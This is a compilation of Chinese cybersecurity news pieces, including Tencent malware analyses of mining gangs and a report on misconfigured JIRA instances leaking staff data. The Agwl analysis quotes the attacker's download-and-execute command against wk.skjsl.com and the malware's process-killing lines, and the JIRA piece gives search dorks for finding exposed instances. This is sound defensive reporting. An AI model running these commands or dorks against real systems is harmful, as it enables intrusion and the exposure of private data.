感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/wCjKwENZajw1vA9dmdgftQ   腾讯安全御见威胁情报中心监测到“Agwl”团伙在近期的入侵行动将Linux系统纳入攻击范围。 一、背景 腾讯安全御见威胁情报中心监测到“Agwl”团伙在近期的入侵行动将Linux系统纳入攻击范围。“Agwl”团伙于2018年7月被御见威胁情报中心发现，其攻击特点为探测phpStudy搭建的网站，并针对其网站搭建时使用的默认的MySQL弱口令进行爆破登录，从而植入挖矿以及远控木马。 该团伙早期入侵后植入的都是基于Windows平台的木马，其挖矿木马部分会首选清除其他挖矿程序、阻止其他挖矿木马访问矿池、独享系统资源。而最近的更新中，我们监测发现，“Agwl”团伙增加了对Linux系统的攻击，入侵成功后加入基于Linux系统执行的bash脚本代码s667。该脚本运行后会添加自身到定时任务，并进一步下载Linux平台下的CPU挖矿木马bashf和GPU挖矿木马bashg。 然而此时攻击并没有结束，“Agwl”团伙会继续植入Linux平台的DDoS病毒lst（有国外研究者命名为“Mayday”）以及勒索蠕虫病毒Xbash。Xbash勒索病毒会从C2服务器读取攻击IP地址段，扫描这些网络中的VNC、Rsync、MySQL、MariaDB、Memcached、PostgreSQL、MongoDB和phpMyAdmin服务器进行爆破攻击，爆破登录成功后不像其他勒索病毒那样去加密数据再勒索酬金，而是直接将数据库文件删除后骗取酬金，企业一旦中招将会遭受严重损失。 “Agwl”团伙攻击流程 二、详细分析 中招主机通过phpStudy一键部署PHP环境，默认情况下包含phpinfo及phpMyAdmin并且任何人都可以访问，同时安装的MySQL默认口令为弱口令密码并且开启在外网3306端口。在未设置安全组或者安全组为放通全端口的情况下，受到攻击者对于phpStudy的针对性探测，并且暴露了其MySQL弱口令。攻击者使用MySQL弱口令登录后,在web目录下执行Shell，并在其中添加植入挖矿木马的恶意代码。 入侵后执行shell命令为： cmd.exe /c “certutil.exe -urlcache -split -f http://wk.skjsl.com:93/Down.exe &Down.exe &del Down.exe&cd /tmp &&wget http://wk.skjsl.com:93/s667 &chmod 777 s667&./s667 “Agwl”团伙对Windows平台植入的木马为Down.exe，针对Linux平台植入的是s667。 Down.exe Down.exe为自解压程序，解压后释放一个hosts文件和7个BAT文件。根据解压命令，文件被释放到C:\Windows\debug\SYSTEM 目录下，首先被执行的是start.bat Start.bat主要功能为： 创建目录C:\ProgramData\Microsoft\test并设置为隐藏，将down.bat、open.bat、skycmd.bat拷贝到该目录中并安装为计划任务反复执行，对应的计划任务名分别为“SYSTEM”、“DNS”、“skycmd”；然后从www[.]kuaishounew.com下载wget.exe作为后续下载工具；最后启动start2.bat。 Start2.bat的功能为： 利用start.bat中下载的wget.exe从微软官方下载vc_redist.x64.exe，从www[.]kuaishounew.com下载unzip.exe(后续用到的解压工具)和hook.exe，然后执行install3.bat。 （vcredist_x64.exe是微软的Visual C运行时库,安装后能够在未安装VC的电脑上运行由 Visual C++开发的64位应用，该模块被下载以保证64位木马正常运行。） Install3.bat主要用于木马的三个服务“SYSTEM”、“DNS”、“skycmd”的安装和保持。 1、服务“SYSTEM” 执行的脚本为down.bat，主要功能为下载矿机程序wrsngm.zip进行挖矿，该矿机程序为开源挖矿程序xmr-stak修改而成，github地址https[:]//github.com/fireice-uk/xmr-stak。 使用矿池：wk.skjsl.com:3333 钱包：4AggMSAnFrQbp2c6gb98BZDBydgmjNhhxdN4qBSjwc3BDNQZwg5hRqoNczXMr7Fz6ufbwVaJL8sJmTdrp2dbKYcFRY2pe33 该钱包上线时间不长，查询收益目前仅获得0.7个XMR 2、服务“DNS” 对应执行的脚本为open.bat。功能为替换本地域名解析文件hosts，然后启动挖矿程序。 替换后的hosts文件将其他的矿池域名解析指向127.0.0.1，阻止其正常访问从而独占挖矿所需的计算资源。从该文件中还会将木马原来的C2地址从111.230.195.174迁移至116.206.177.144。 open.bat还会启动qc.bat来清除入侵过程中在xampp、www、phpstudy目录下载残留的EXE木马，以及badboy.php、test00.php木马。 3、服务“skycmd” 执行脚本skycmd.bat。功能为下载skycmdst.txt，重命名为skycmdst.bat并执行，目前下载该文件为网页文件，但黑客可通过后台配置动态更改下载的恶意代码。 s667 s667为入侵Linux系统后首先执行的脚本。脚本判断当前是否是root权限，如果不是则下载lower23.sh到/tmp/目录并通过nohup bash命令执行；如果是root权限则添加下载执行s667的定时任务，每5分钟执行一次，然后下载rootv23.sh到/tmp/目录并通过nohup bash命令执行。 最终下载执行的bash脚本lower23.sh或root23.sh负责植入Linux版本挖矿木马、清理竞品挖矿木马以及植入其他病毒等功能。 在function kills()中对竞品挖矿木马进行清除： 1、按照进程名匹配（包括被安全厂商多次披露的利用redis入侵挖矿的木马“ddg*”、“sourplum”、”wnTKYg”）。 pkill -f sourplum pkill wnTKYg && pkill ddg && rm -rf /tmp/ddg && rm -rf /tmp/wnTKYg pkill -f biosetjenkins pkill -f Loopback pkill -f apaceha pkill -f cryptonight pkill -f stratum pkill -f mixnerdx pkill -f performedl pkill -f JnKihGjn pkill -f irqba2anc1 pkill -f irqba5xnc1 pkill -f irqbnc1 pkill -f ir29xc1 pkill -f conns pkill -f irqbalance pkill -f crypto-pool pkill -f minexmr pkill -f XJnRj pkill -f NXLAi 2、按照矿池匹配，杀死连接指定矿池的进程 ps auxf|grep -v grep|grep “mine.moneropool.com”|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:8080″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:3333″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “monerohash.com”|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “/tmp/a7b104c270″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:6666″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:7777″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmr.crypto-pool.fr:443″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “stratum.f2pool.com:8888″|awk ‘{print $2}’|xargs kill -9 ps auxf|grep -v grep|grep “xmrpool.eu” | awk ‘{print $2}’|xargs kill -9 3、按照端口匹配，杀死使用端口9999/5555/7777/14444进行tcp通信的进程 PORT_NUMBER=9999 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 PORT_NUMBER=5555 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 PORT_NUMBER=7777 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 PORT_NUMBER=14444 lsof -i tcp:${PORT_NUMBER} | awk ‘NR!=1 {print $2}’ | xargs kill -9 4、删除指定目录文件 rm -rf /boot/grub/deamon && rm -rf /boot/grub/disk_genius rm -rf /tmp/index_bak rm -rf /tmp/httpd.conf rm -rf /tmp/*httpd.conf rm -rf /tmp/a7b104c270 rm -rf /tmp/httpd.conf rm -rf /tmp/conn rm -rf /tmp/conns rm -f /tmp/irq.sh rm -f /tmp/irqbalanc1 rm -f /tmp/irq 在function downloadyam()中下载Linux挖矿程序bashg(由开源GPU挖矿程序xmr-stak编译)和配置文件pools.txt；下载Linux平台CPU挖矿程序bashf(采用开源挖矿程序XMRig编译)以及配置文件名config.json。两种挖矿程序均使用与攻击Windows平台时相同的门罗币矿池和钱包。 DDoS病毒 lower23.sh在完成挖矿功能后，还会植入基于Linux的DDoS病毒lst(国外厂商命名为Mayday) lst搜集以下信息，并将其保存至结构g_statBase中： 系统版本 CPU核心数及其时钟速率 CPU负载 网络负载 创建一个新线程CThreadTaskManager :: ProcessMain（），将开始攻击和终止攻击的命令放入执行队列。在此之后，创建一个新线程CThreadHostStatus :: ProcessMain（），在此线程中，CPU和网络负载的数据每秒更新一次，如果接到请求，可以随时将数据发送到C＆C服务器。 然后创建20个线程，从任务队列中读取信息，并根据读取的信息启动攻击或终止攻击。 建立与C＆C的连接后，进入处理来自C＆C的消息的无限循环。如果命令具有参数，则C＆C则会发送另外4个字节，病毒根据接收到的不同参数执行不同类型的DDoS攻击。 执行DDoS攻击命令协议如下： 0×01 发起攻击，参数定义攻击的类型和要使用的线程数。攻击类型由一个字节定义，该字节可以取值0x80到0x84，共有5种攻击类型： 0x80 – TCP洪水攻击。 0x81 – UDP洪水攻击。 0x82 – ICMP洪水攻击。 0x83,0x84 – 两次DNS洪水攻击。两种攻击都类似于0x81，除了端口53（DNS服务的默认端口）用作目标端口。 0x02 终止攻击。 0x03 更新配置文件。 0x04 用于将当前命令的执行状态发送到C＆C服务器。 勒索蠕虫 lower23.sh继续植入在基于Linux平台执行的勒索蠕虫病毒Xbash Xbash为使用PyInstaller将Python代码打包生成的ELF格式可执行程序，用于感染Linux系统。使用工具pyi-archive_viewer可提取出其中的pyc文件，然后通过反编译程序将其还原成Python代码。 Xbash会通过弱口令爆破和已知的服务器组件漏洞进行攻击，而且会删除目标系统中的数据库，在删除数据后提示勒索比特币，然而并没有发现其具有恢复数据的功能。 扫描端口： HTTP：80,8080,8888,8000,8001,8088 VNC：5900,5901,5902,5903 MySQL：3306 Memcached：11211 MySQL/MariaDB：3309,3308,3360 3306,3307,9806,1433 FTP：21 Telnet：23,2233 PostgreSQL：5432 Redis：6379,2379 ElasticSearch：9200 MongoDB：27017 RDP：3389 UPnP/SSDP：1900 NTP：123 DNS：53 SNMP：161 LDAP：389 Rexec：512 Rlogin：513 Rsh：514 Rsync：873 Oracle数据库：1521 CouchDB：5984 对于某些服务，如VNC，Rsync，MySQL，MariaDB，Memcached，PostgreSQL，MongoDB和phpMyAdmin，如果相关端口打开，则使用内置的弱用户名/密码字典进行爆破登录 爆破登录成功后对用户的数据库进行删除： 然后在数据库中创建勒索提示文本PLEASE_README_XYZ，勒索金额为0.02个比特币： Send 0.02 BTC to this address and contact this email with your website or your ip or db_name of your server to recover your database! Your DB is Backed up to our servers!If we not recived your payment,we will leak your database’, LygJdH8fN7BCk2cwwNBRWqMZqL1′,’backupsql@pm.me 三、安全建议 加固服务器，修补服务器安全漏洞，对于phpStudy一类的集成环境，在安装结束后应及时修改MySQL密码为强密码，避免被黑客探测入侵。 服务备份重要数据，并进行内网外网隔离防止重要数据丢失。检查并去除VNC、Rsync、MySQL、MariaDB、Memcached、PostgreSQL、MongoDB和phpMyAdmin等服务器使用的弱口令。 网站管理员可使用腾讯云网站管家智能防护平台（网址：https://s.tencent.com/product/wzgj/index.html），该系统具备Web入侵防护，0Day漏洞补丁修复等多纬度防御策略，可全面保护网站系统安全。 使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统，是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据，研发出的独特威胁情报和恶意检测模型系统。 IOCs IP 116.206.177.144 Domain down.ctosus.ru wk.skjsl.com fk3.f3322.org sbkcbig.f3322.net URL http[:]//down.ctosus.ru/bat.exe http[:]//wk.skjsl.com:93/s667 http[:]//wk.skjsl.com:93/lowerv23.sh http[:]//wk.skjsl.com:93/rootv23.sh http[:]//wk.skjsl.com:93/xlk http[:]//wk.skjsl.com/wrsngm.zip http[:]//wk.skjsl.com/downulr.txt http[:]//wk.skjsl.com/config.sjon http[:]//wk.skjsl.com/bashf http[:]//wk.skjsl.com/bashg http[:]//wk.skjsl.com/pools.txt http[:]//wk.skjsl.com/lst http[:]//wk.skjsl.com/XbashH http[:]//wk.skjsl.com/NetSyst96.dll http[:]//www.kuaishounew.com/Down.exe http[:]//www.kuaishounew.com/apps.txt http[:]//www.kuaishounew.com/hook.exe http[:]//www.kuaishounew.com/hehe.exe http[:]//www.kuaishounew.com/office.exe http[:]//www.kuaishounew.com/hehe.exe http[:]//www.kuaishounew.com/hosts http[:]//116.206.177.144/wrsngm.zip http[:]//fk3.f3322.org/skycmdst.txt md5 51d49c455bd66c9447ad52ebdb7c526a fb9922e88f71a8265e23082b8ff3d417 cacde9b9815ad834fc4fb806594eb830 17f00668f51592c215266fdbce2e4246 40834e200ef27cc87f7b996fe5d44898 3897bdb933047f7e1fcba060b7e49b40 39ea5004a6e24b9b52349f5e56e8c742 8fdfe319255e1d939fe5f4502e55deee 13f337029bae8b4167d544961befa360 1b93e030d2d6f1cef92b2b6323ff9e9e 589ba3aac5119fc4e2682bafb699727b 82d28855a99013c70348e217c162ceb9 门罗币钱包1： 4Ak2AQiC1R4hFmvfSYRXfX6JSjR6YN9E81SRvLXRzeCefRWhSXq3SKDf8ZEFmpobNkXmgXnqA3CGKgaiAEJ2pjYi8BeQcn7 门罗币钱包2: 4AggMSAnFrQbp2c6gb98BZDBydgmjNhhxdN4qBSjwc3BDNQZwg5hRqoNczXMr7Fz6ufbwVaJL8sJmTdrp2dbKYcFRY2pe33 比特币钱包： 1jqpmcLygJdH8fN7BCk2cwwNBRWqMZqL1 邮箱： backupsql@pm.me 参考链接 https://www.freebuf.com/column/195035.html https://www.freebuf.com/column/178753.html https://securelist.com/versatile-ddos-trojan-for-linux/64361/ https://unit42.paloaltonetworks.com/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/

来自国外的开发者 Avinash Jain 在8月2日时发表了一篇文章，揭露全球范围内使用非常广泛的问题跟踪软件 JIRA 由于错误的配置导致成千上万的公司泄露了内部的员工以及项目数据的问题。Jain 同时提供了如何去找出这些存在漏洞的 JIRA 系统的方法。 以下是 Jain 文章的内容： 几个月前，我发表了一篇关于“JIRA 泄露 NASA 员工和项目数据”的文章，我能够在这些泄露的数据中找到NASA员工的详细信息，包括用户名、电子邮件、ID 以及他们的内部项目详细信息。他们用的就是 Atlassian 的 JIRA 工具 – 一个独立任务跟踪系统/项目管理软件，全球约有135,000家公司和组织在使用。 而这次数据泄漏的根本原因是 JIRA 中存在的疯狂错误配置。 为什么使用“狂野”一词，是因为如果你的公司也在使用相同的错误配置，那么我也可以访问你们内部的用户数据和内部项目详细信息。 受影响的客户包括 NASA，谷歌，雅虎，Go-Jek，HipChat，Zendesk，Sapient，Dubsmash，西联汇款，联想，1password，Informatica等公司，以及世界各地政府的许多部门也遭受同样的影响，如欧洲政府，联合国，美国航天局，巴西政府运输门户网站，加拿大政府财政门户网站之一等。 接下来我将分享我在Jira（Atlassian任务跟踪系统/项目管理软件）中发现的那个关键漏洞，或者更具体地说是导致组织和公司内部敏感信息泄露的错误配置问题。 让我们看看究竟是什么问题！ 在 JIRA 中创建过滤器或仪表板时，它提供了一些可见性选项。问题是由于分配给它们的权限错误。当在JIRA中创建项目/问题的过滤器和仪表板时，默认情况下，可见性分别设置为“所有用户”和“所有人”，而不是与组织中的每个人共享，所以这些信息被完全公开了。JIRA 中还有一个用户选择器功能，它提供了每个用户的用户名和电子邮件地址的完整列表。此信息泄露是 JIRA 全局权限设置中授权配置错误的结果。由于权限方案错误，以下内部信息容易受到攻击： 所有账号的雇员姓名和邮箱地址 雇员的角色 项目信息、里程碑等 任何拥有该系统链接的人都可以从任何地方访问它们并获取各种敏感信息，由于这些链接可能被所有搜索引擎编入索引，因此任何人都可以通过一些简单的搜索查询轻松找到它们。 来看看一些泄露的数据： 1. NASA员工数据 2. JIRA 过滤器公开访问 3. NASA 项目详情 如上所示，由于这些配置错误的JIRA设置，它会公开员工姓名，员工角色，即将到来的里程碑，秘密项目以及各种其他信息。 现在，我来介绍一下如何通过 来自“Google dorks”（搜索查询）找到这些公开曝光的用户选择器功能、过滤器以及许多公司的仪表板的链接/URL。 我通过 Google 的搜索如下： inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log 然后结果就出来了： 此查询列出了其URI中具有“UserPickerBrowser”的所有URL，以查找公开而且不需要经过身份验证的所有配置错误的 JIRA 用户选择器功能。 谷歌收购Apigee员工数据公开曝光 Go-jek 员工数据公开曝光 还有前面提到的 NASA 泄露的数据。 对于过滤器和仪表板，我们可以看到这些过滤器和仪表板的URL包含“Managefilters”和“ConfigurePortal”作为一部分。 我继续创建搜索查询 – inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the public OR intext:Public ) 此查询列出了所有在其URI中具有“Managefilters”并且文本为“Public”的URL，以便找到所有公开暴露且未经过身份验证的错误配置的JIRA过滤器。 结果如下： inurl:/ConfigurePortalPages!default.jspa?view=popular 此查询列出其URI中具有“ConfigurePortalPages”的所有URL，以查找公开公开的所有JIRA仪表板。 在进一步侦察（信息收集）时，我发现各公司都有“company.atlassian.net”格式的JIRA URL，因此如果您想检查任何配置错误的过滤器，仪表板或用户选择器功能的公司，您需要 只需将他们的名字放在URL中 – https://companyname.atlassian.net/secure/popups/UserPickerBrowser.jspa https://companyname.atlassian.net/secure/ManageFilters.jspa?filterView=popular https://companyname.atlassian.net/secure/ConfigurePortalPages!default.jspa?view=popular 数以千计的公司过滤器，仪表板和员工数据被公开曝光。 这是因为设置为过滤器和仪表板的错误权限方案因此甚至提供了对未登录用户的访问权限，从而导致敏感数据泄漏。 我在数百家公司中发现了几个错误配置的JIRA帐户。 一些公司来自Alexa和Fortune的顶级名单，包括像NASA，谷歌，雅虎等大型巨头和政府网站，以及 – 巴西政府对Jira过滤器错误配置了他们的道路和运输系统，因此暴露了他们的一些项目细节，员工姓名等，这些都是在与他们联系后修复的。 同样，联合国意外地将他们的Jira过滤器和Jira仪表板公开，因此暴露了他们的内部项目细节，秘密里程碑等，在我报告之后由他们修复并且在他们的名人堂名单中得到奖励。 当他们的商业金融软件系统和解决方案具有相同的Jira错误配置并暴露其内部敏感项目和员工细节时，甚至欧洲政府也遭受了同样的风险。 在我向他们发送报告后，他们也对其进行了修复，并在其名人堂名单中得到了认可。 这些公开可用的过滤器和仪表板提供了详细信息，例如员工角色，员工姓名，邮件ID，即将到来的里程碑，秘密项目和功能。 而用户选择器功能公开了内部用户数据。 竞争对手公司有用的信息，可以了解其竞争对手正在进行的即将到来的里程碑或秘密项目的类型。 即使是攻击者也可以从中获取一些信息并将其与其他类型的攻击联系起来。 显然，它不应该是公开的，这不是安全问题，而是隐私问题。 我向不同的公司报告了这个问题，一些人给了我一些奖励，一些人修复了它，而另一些人仍在使用它。 虽然这是一个错误配置问题，Atlassian（JIRA）必须处理并更明确地明确“任何登录用户”的含义，无论是JIRA的任何登录用户还是仅登录属于特定 JIRA 公司帐户的用户。   （稿源：开源中国，封面源自网络。）

据外媒The Verge报道，根据周四发布的一份修订报告，美国参议院情报委员会得出结论称，所有50个州的选举系统都是与俄罗斯政府有关的黑客攻击的目标。 2017年美国国土安全部曾正式发出通告，黑客将目标对准美国21个州的选举系统。在今年4月，国土安全部和联邦调查局的一份联合报告表明，俄罗斯黑客可能试图调查美国每个州的选举系统是否存在漏洞。 目前尚不清楚参议院情报委员会对俄罗斯对每个州的探究情况有多确定，或证据可能是什么。但它确实表示，2018年收集的一些情报支持了国家安全委员会网络安全协调员Michael Daniel和国土安全部早先的假设，即每个州都被黑客入侵。 报告还写道：“俄罗斯网络行为者可以删除或更改选民数据”。然而外媒指出，美国政府仍然没有任何证据证明俄罗斯实际上篡改了任何选民数据，也没有证据表明黑客访问了实际的投票机。俄罗斯黑客似乎针对选民登记系统和投票数据库。而穆勒的报告也表明投票机公司也是俄罗斯GRU的目标。   （稿源：cnBeta，封面源自网络。）

黑客入侵了俄罗斯国家情报部门FSB的承包商SyTech，并从那里窃取了该公司为FSB工作的内部项目的信息 – 包括用于对Tor流量进行去匿名化的信息。攻击事件发生在上周末，即7月13日，一群名为0v1ru $的黑客入侵了SyTech的活动目录服务器，从那里他们获得了访问该公司整个IT网络的权限，包括一个JIRA实例。 黑客从承包商的网络中窃取了7.5TB的数据，末了他们还顺手用一个“yoba face”破坏了该公司的网站，这是一个受俄罗斯用户欢迎的表情符号。 黑客在Twitter上发布了该公司服务器数据的截图，后来又与数字革命组织分享了被盗数据。数字革命是另一个黑客组织，他们去年攻破了另一家FSB承包商Quantum公司。 黑客组织之后还与俄罗斯记者在Twitter账户上更详细地分享了被盗文件。 根据俄罗斯媒体的报道，这些文件表明，自2009年以来，SyTech已经为FSB和同行承包商Quantum开展了多个项目。项目包括： Nautilus  – 一个收集社交媒体用户（如Facebook，MySpace和LinkedIn）数据的项目。 Nautilus-S  – 在流氓Tor服务器的帮助下对Tor流量进行去匿名化的项目。 Reward – 一个暗中渗透P2P网络的项目，就像BT网络一样。 Mentor  – 一个监控和搜索俄罗斯公司服务器上的电子邮件通信的项目。 Hope – 一个调查俄罗斯互联网拓扑及其与其他国家网络连接的项目。 Tax-3  – 一个用于创建封闭内联网的项目，用于存储高度敏感的州级人员，法官和当地政府官员的信息，与该州的其他IT网络分开。 另有文件显示，还有其他较旧的项目用于研究其他网络协议，如Jabber（即时通讯），ED2K（eDonkey）和OpenFT（企业文件传输）。 数字革命Twitter账户上发布的其他文件声称，FSB也在跟踪学生和养老金领取者。 虽然大多数项目只是对现代技术的研究，但有两项似乎已经在现实世界中进行了测试。 第一个是Nautilus-S，用于对Tor流量进行去匿名化。 Nautilus-S的工作始于2012年，两年后，2014年，瑞典卡尔斯塔德大学的学者发表了一篇论文，详细描述了试图解密Tor流量的出口节点的技术进展。研究人员确定了25个恶意服务器，其中18个位于俄罗斯，并运行Tor版本0.2.2.37，与泄漏文件中详述的相同。 第二个项目是Hope，它分析了俄罗斯互联网部分的结构和构成。今年早些时候，俄罗斯进行了断网测试，在此期间，俄罗斯将其国家网络与其他互联网断开。 被黑客入侵的SyTech公司自黑客入侵以来一直关闭其网站并拒绝媒体采访。   （稿源：cnBeta，封面源自网络。）

美国移动通讯运营商Sprint近日发布警告称，有黑客通过三星官网（Samsung.com）上新办号码“Add a line”页面入侵获取用户账号信息，目前尚不清楚有多少用户受到影响。Sprint在致受影响用户的信中表示：“6月22日，Sprint检测到有黑客通过三星官网‘新办号码’页面在未经你知悉和授权的情况下访问了你的Sprint账号。” Sprint在信件中表示：“黑客可能已经获取了你的个人信息，包括电话号码，设备类型，设备ID，每月经常性费用，用户ID，帐号，帐户创建日期，升级资格，姓名，帐单地址和附加服务。”Sprint表示黑客获取的信息并未构成“欺诈或身份盗窃的重大风险”，但对于受影响用户来说显然并不赞同这种评估说法。 对此Sprint表示已经要求所有受到影响的账户在3天后于6月25日重置PIN码。Sprint的安全通知内缺少了一些非常重要的细节，例如被窃用户的数量、黑客首次通过Samsung.com网站开始访问Sprint帐户的日期，以及黑客是否修改了任何客户帐户详细信息。ZDNet向Sprint提出了所有这些问题，并首先询问了Sprint如何发现这一漏洞。发言人没有及时回复。   （稿源：cnBeta，封面源自网络。）

据《纽约时报》报道，全美超过225位市长支持一项不向黑客支付赎金的决议。这项名为“反对向勒索软件攻击犯罪者付款” 的决议指出，市长们应“团结一致反对在发生IT安全漏洞时支付赎金”。 该决议来自6月28日至7月1日在檀香山举行的年度美国市长会议。根据该声明，自2013年以来，至少有170个县、市或州政府系统成为勒索软件攻击的目标。这些攻击使用的恶意软件程序使系统无法运行，黑客通常要求以加密货币的形式支付费用。 该决议发布之前，今年有近二十多个美国城市受到勒索软件攻击，其中包括佛罗里达州的莱克城，后者授权向黑客支付43个比特币以重新获得对其手机和电子邮件系统的访问权。5月份在巴尔的摩开始了另一场引人注目的高调攻击，该攻击通过网络钓鱼邮件关闭了重要的城市系统。黑客要求该市支付13个比特币（当时价值约为76280美元，现在估计约为151599美元）。但是，联邦调查局建议市长副总参谋长Sheryl Goldstein不支付赎金。据估计，这次攻击至少造成了1800万美元的损失。 巴尔的摩市长Bernard C.“Jack”Young在今年的会议上支持了这项措施，并在周三的一份声明中表示，“支付赎金只会激励更多人参与这种非法行为。” 美国市长会议代表了1407个城市，每个城市的人口数超过30000。这些市长的普遍立场与联邦调查局的建议一致。   （稿源：cnBeta，封面源自网络。）

据外媒MSPoweruser报道，曾于2013年年底和2014年年初对游戏开发商Daybreak Game Company（前索尼在线娱乐公司）发起DDoS攻击的Austin Thompson被判入狱两年，此外他需要向该公司支付至少95000美元的赔偿金。 23岁 Thompson于2018年11月对攻击事件认罪。他承认自己是黑客组织DerpTrolling的一员，并被指控造成“受保护计算机受损，触犯了美国联邦法律18USC§1030（a）（5）（A）”。 官方新闻发布称Thompson“通常使用Twitter帐户@DerpTrolling宣布即将发起攻击，然后发布”scalps“（截图或其他照片显示受害者的服务器已经被攻击）”。 虽然汤普森目前保释在外，但他已被命令于8月23日向当局投降，以便开始服刑。该最新最高可判处十年监禁和25万美元的罚款。 Polygon报告称，美国和芬兰的检察官也成功地确认了Lizard Squad的两名成员的定罪，Lizard Squad也在2014年对Daybreak Game Company进行了DDoS攻击。   （稿源：cnBeta，封面源自网络。）

感谢腾讯御见威胁情报中心来稿！ 原文：https://mp.weixin.qq.com/s/z3FWK4vqUBGsHwavNOGYIw   一、背景 腾讯安全御见威胁情报中心近期监测到黑产团伙针对MS SQL服务器进行弱口令爆破攻击，攻击成功后再利用多个提权工具进行提权，随后，攻击者会植入门罗币挖矿木马及anydesk远程控制软件长期占有该服务器。 该团伙攻击手法与今年4月曝光的“贪吃蛇”挖矿木马团伙比较类似，病毒挖矿的同时会封堵系统的135，139，445端口，防止已被自己攻占的系统再被其他黑产团伙入侵控制。该病毒团伙尚不能确定归属于“贪吃蛇”挖矿木马团伙，腾讯安全御见威胁情报中心将其命名为“贪吃蛇2号”。 “贪吃蛇2号”木马团伙主要危害MS SQL系统管理员使用弱密码的企业网络，一旦爆破入侵成功，会利用多个提权工具采取进一步的行动。我们的监测数据表明，“贪吃蛇2号”木马团伙已控制超过500台服务器。 腾讯安全专家建议企业网管尽快为服务器安装补丁，并停止使用弱口令，数据库服务器被黑客暴力破解再完全控制会导致企业计算资源被恶意挖矿、企业关键业务信息泄露，入侵者还可能通过这些被控制的服务器继续在内网攻击传播。受害企业可使用腾讯御点终端安全防护系统或腾讯电脑管家拦截清除此类病毒。 二、详细分析 黑客通过MS SQL爆破入侵服务器，入侵成功后第一个步骤就是提权，提权工具被放置在TQ.exe的资源中，共6个提权工具，分别用了2015年-2018年的典型提权漏洞，涵盖Windows Vista至Windows 10系统及Windows Server系统。 提权工具：MS15.exe WIN8.1提权漏洞，该漏洞是2014年9月30号google报给微软的，漏洞发生在chcache.sys驱动NtApphelpCacheControl函数，2015年1月公开POC。 提权工具：MS16_32.exe 2016年的提权工具，利用漏洞编号CVE-2016-0099 受影响系统 Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1 Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1 Windows 10 Gold 提权工具：MS17.exe 利用COM组件权限许可和访问控制漏洞，漏洞公布时间为2017年5月17日，漏洞编号CVE-2017-0213 受影响系统： Microsoft Windows Server 2016 0 Microsoft Windows Server 2012 R2 0 Microsoft Windows Server 2012 0 Microsoft Windows Server 2008 R2 for x64-based Systems SP1 Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 Microsoft Windows Server 2008 for x64-based Systems SP2 Microsoft Windows Server 2008 for Itanium-based Systems SP2 Microsoft Windows Server 2008 for 32-bit Systems SP2 Microsoft Windows RT 8.1 Microsoft Windows 8.1 for x64-based Systems 0 Microsoft Windows 8.1 for 32-bit Systems 0 Microsoft Windows 7 for x64-based Systems SP1 Microsoft Windows 7 for 32-bit Systems SP1 Microsoft Windows 10 version 1703 for x64-based Systems 0 Microsoft Windows 10 version 1703 for 32-bit Systems 0 Microsoft Windows 10 Version 1607 for x64-based Systems 0 Microsoft Windows 10 Version 1607 for 32-bit Systems 0 Microsoft Windows 10 version 1511 for x64-based Systems 0 Microsoft Windows 10 version 1511 for 32-bit Systems 0 Microsoft Windows 10 for x64-based Systems 0 提权工具：MS18_32.exe 2018年的内核提权漏洞，部分Windows系统win32k.sys组件的NtUserSetImeInfoEx系统函数内部未验证内核对象中的空指针对象，普通应用程序可利用该空指针漏洞以内核权限执行任意代码。 受影响系统： Windows 7 for 32-bit Systems Service Pack 1 Windows 7 for x64-based Systems Service Pack 1 Windows Server 2008 for 32-bit Systems Service Pack 2 Windows Server 2008 for Itanium-Based Systems ServicePack 2 Windows Server 2008 for x64-based Systems Service Pack 2 Windows Server 2008 R2 for Itanium-Based Systems ServicePack 1 Windows Server 2008 R2 for x64-based Systems ServicePack 1 提权工具：JuicyPotato TQ失败后，则会下载新的提权工具JuicyPotato，JuicyPotato是windows平台上的一个综合提权包，主要通过拦截加载COM组件加载前后的NTLM认证数据包进行攻击。 黑客启用的HFS服务器： EW.exe是著名的内网穿透工具Earthworm，主要做内网上线用，Lcx是内网端口转发工具，scan是一个端口扫描工具，配合Earthworm使用。 2019-5.exe是一个自解压文件，包含远控工具，进程管理，挖矿组件等，解压密码bing，目录列表： Kill.exe及PH64.Exe是进程管理工具，两者都属于内核级的进程管理工具，用以结束一些反病毒工具的进程，待结束的进程列表： 挖矿组件： 1_64N中包含了挖矿组件，使用了NSSM服务模块启动挖矿程序 服务名Networks 钱包： 438uqHTH7gqPfSBJhxpELTFqgafi4y48FJroP7MQ5r9DdvJqyMXnqWGa9YqtDiHueo3HnpRygtfEsc4EqQdrS1Y1EJpKBS9.AAA 矿池（私有矿池） p1.local.xmrrr.com:80 2_crontab.exe负责写入计划任务 计划任务名为“Windows Update“，名字具有较强迷惑性,正常的Windows Update不是以计划任务形式启动的,而是以服务形式启动。 木马入侵成功后会尝试关闭掉本机一些不必要的端口，防止已被自己攻占的系统再被其他黑产团伙入侵控制。 最终会在本机安装anydesk远控工具，并接收黑客的远程控制。 三、安全建议 1、加固SQL Server服务器，修补服务器安全漏洞。使用安全的密码策略，使用高强度密码，切勿使用弱口令，特别是sa账号密码，防止黑客暴力破解。 2、修改SQL Sever服务默认端口，在原始配置基础上更改默认1433端口设置，并且设置访问规则，拒绝1433端口探测。 